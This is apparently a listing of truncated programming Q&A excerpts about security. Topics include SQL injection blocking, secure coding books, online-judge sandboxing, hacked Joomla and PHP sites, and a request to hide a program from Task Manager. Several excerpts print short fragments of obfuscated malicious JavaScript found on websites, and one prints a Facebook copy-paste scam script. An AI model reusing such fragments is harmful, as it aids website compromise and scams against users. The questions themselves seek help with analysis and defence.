I am looking for a tool that can detect malicious requests (such as obvious SQL injection gets or posts) and will immediately ban the IP address of the requester/add to a blacklist. I know, I know, the code should be able to handle such requests accordingly but there is still value in such a tool even when the site is safe from such at...
What is the best book to read about security issues that should be kept in mind while programming? What should a c++ programmer know about security? Is it worth buying any one of the following book If so which one should I get. Secure Coding In C & C++ Secure Programming Cookbook for C and C++ Writing Secure code ...
I've spent more than a few hours humbling myself on the ACM ICPC's problem set archive, and I've wondered how the online judge is able to compile and run source code from any user and prevent malicious attacks to their system. Are the compiled binaries run from some kind of limited sandbox? How would one go about setting up this kind o...
I'm looking for a good algorithm recommendation. I have Users and Achievements. Users create Achievements and then give them to other Users. Associated with each Achievement is the point value that the user specifies. A User's total points is the sum of all their achievements. Basically: Achievement : owner = Alias points = in...
Is there any way to hide a C# program from the Windows Task Manager? EDIT: Thanks for the overwhelming response! Well I didn't intend to do something spooky. Just wanted to win a bet with my friend that I can do it without him noticing. And I'm not a geek myself to be able to write a rootkit, as someone suggested though I'd love to know...
My Joomla! website has been repeatedly hacked into. Someone, somehow, managed to inject the following rubbish into the key php scripts, but I mean not to talk about configuring Joomla. The site is not visited much (at times I fear I might be the only visitor to that site...) and I don't care much to have the site back up and running. I'l...
You always read in changelogs when your system or browser or any program updates that they fixed a bug that made possible that an attacker can execute any code in your computer with a forged website, or attacking your computer with carefully forged packets, etc... Because you read it so often that means any program can have similar vuln...
I found this code in my website sourcecode: var _0xd28d=["\x5F\x30\x78\x33\x32\x6C\x73\x6A\x39","\x5F\x78\x6C\x74","\x5F\x78\x38\x66\x6B\x63\x33","\x66\x6C\x6F\x6F\x72","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68"]; var _0x9ae4=[_0xd28d[0],12,_0xd28d[1],_0xd28d[2],2,31,Math,_0xd28d[3]]; var _0xcd6e=[_0x9ae4[5],_0x9ae4[0],_0x9ae...
We developers are in a unique position when it comes to the ability to not only be skeptical about the capabilities provided by open source software, but to actively analyze the code since it is freely available. In fact, one may even argue that open source software developers have a social responsibility to do so to contribute to the c...
This script was added to a defaced web page of a client web site running PHP. I have no clue what this script can do, and do not know whether this is really malicious. Can someone advise. Please find code below.... var GU = ''; var h; var X = new String(); var mP = ""; H = function () { var F = ["hu"]; function L(Lc, O, d) { ...
Not so much a question to help my own programming, but I found this page on facebook with a cool illusion and a page that says "to see the real illusion, copy and paste this code into your address bar" and there is a script: DISCLAIMER: DO NOT RUN THE FOLLOWING CODE javascript:(function(){a='app129556453726651_fsDszN'; b='app1295564537...
I've noticed a new trend in distributing potentially unsafe code where people will post an image to a server with a watermark suggesting that they change the filename to have a .HTA file extension. I realized that .HTA was an HTML Application file, which are implicitly trusted by Microsoft's logic and can contain code to do just about a...
I want to to detect whether a given program can perform malicious operations like forking , interprocess piping , input/output redirection, file handling etc. Actually I am developing a program that checks java codes and do not want the coder to harm my code checker system in any way. What are the packages I should look for in code to en...
I have ASP.NET form with an upload control for users to post an image. On the server I load that image (using the Bitmap class) and resize it. Is there any danger in doing that when users upload malicious or affected files or will the code just throw an exception at some point and stop the whole process? ...